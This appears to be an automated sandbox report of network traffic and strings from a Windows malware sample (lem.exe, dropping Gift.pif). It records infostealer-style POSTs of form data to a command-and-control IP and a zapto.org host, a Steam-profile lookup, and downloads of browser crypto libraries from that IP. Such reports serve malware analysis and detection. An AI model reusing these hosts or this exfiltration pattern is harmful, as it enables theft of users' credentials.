                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 4421Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 2449Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 6533Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 3269Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 11445Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 11449Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 4277Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 4273Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 4317Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 1977Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 3161Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 1697Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 1929Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 465Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJJDHDGDAAKECAKJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: arpdabl.zapto.orgContent-Length: 50529Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_003429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_003429BA
                        Source: global traffic | HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic | DNS traffic detected: DNS query: KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqy
                        Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                        Source: global traffic | DNS traffic detected: DNS query: arpdabl.zapto.org
                        Source: unknown | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 188.245.87.202 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://arpdabl.FCBFIEGCAE
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://arpdabl.zapto
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://arpdabl.zapto.
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://arpdabl.zapto.GCAE
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://arpdabl.zapto.org
                        Source: Gift.pif, 0000000B.00000002.3226364575.00000000128B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://arpdabl.zapto.org/
                        Source: Gift.pif, 0000000B.00000002.3226364575.00000000128B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://arpdabl.zapto.org/TH
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://arpdabl.zapto.orgE
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://arpdabl.zaptoEGCAE
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: lem.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                        Source: Gift.pif, 0000000B.00000002.3221967002.000000000BED5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: lem.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: lem.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: lem.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreemen
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                        Source: lem.exe, 00000000.00000003.2031229309.000000000293B000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000000.2069414252.0000000000399000.00000002.00000001.01000000.00000006.sdmp, Gift.pif.2.dr, Automobile.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: Gift.pif, 0000000B.00000002.3222741041.000000000C23D000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://188.245.87.202
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/V;
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/_;
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/freebl3.dll
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/mozglue.dll
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/msvcp140.dll
                        Source: Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/nss3.dll
                        Source: Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/nss3.dllG
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/softokn3.dll
                        Source: Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/sqls.dll
                        Source: Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/vcruntime140.dll
                        Source: Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/vcruntime140.dll1J
                        Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202KJD
                        Source: DHCBGD.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
